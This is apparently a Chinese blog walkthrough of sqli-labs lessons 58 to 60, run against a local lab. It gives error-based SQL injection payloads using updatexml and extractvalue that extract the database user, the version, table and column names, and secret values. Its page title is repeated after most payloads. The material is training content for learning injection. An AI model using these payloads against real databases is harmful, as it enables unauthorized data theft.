Less58 测试union查询无显示,测试报错注入均成功
方式1:
?id=1' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+Less58,59,60【强制报错注入】Less58,59,60【强制报错注入】
方式2:
?id=1' union select extractvalue(1,concat(0x7e,(select @@version),0x7e))--+Less58,59,60【强制报错注入】Less58,59,60【强制报错注入】
表名:
id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='CHALLENGES'),0x7e),1)--+Less58,59,60【强制报错注入】Less58,59,60【强制报错注入】
列名
http://127.0.0.1/sqli-labs-master/Less-58/
?id=1%27%20and%20updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='5bypzr86n6'),0x7e),1)--+Less58,59,60【强制报错注入】Less58,59,60【强制报错注入】
 
字段内容
http://127.0.0.1/sqli-labs-master/Less-58/
?id=1%27%20and%20updatexml(1,concat(0x7e,(select group_concat(secret_Y15Z) from CHALLENGES.pzkk7hwo7o),0x7e),1)--+Less58,59,60【强制报错注入】Less58,59,60【强制报错注入】
 
Less59
无闭合符号
表名
and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='CHALLENGES'),0x7e),1)--+
列名
and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='bp9qzw6kvm'),0x7e),1)--+
字段内容
and updatexml(1,concat(0x7e,(select group_concat(secret_E9SN) from CHALLENGES.bp9qzw6kvm),0x7e),1)--+
 
Less60与58.59一致

相关文章:

  • 2021-05-11
  • 2021-08-29
  • 2021-07-20
  • 2021-04-22
  • 2021-10-26
  • 2021-06-14
  • 2022-02-25
猜你喜欢
  • 2021-06-17
  • 2021-04-30
  • 2021-04-08
  • 2021-12-13
  • 2021-12-30
相关资源
相似解决方案